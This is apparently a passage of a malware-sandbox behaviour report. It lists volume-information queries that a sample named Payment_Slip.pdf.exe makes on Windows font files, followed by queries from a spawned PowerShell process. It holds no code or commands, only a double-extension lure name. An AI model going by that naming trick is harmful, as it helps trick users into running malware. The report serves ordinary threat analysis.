                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
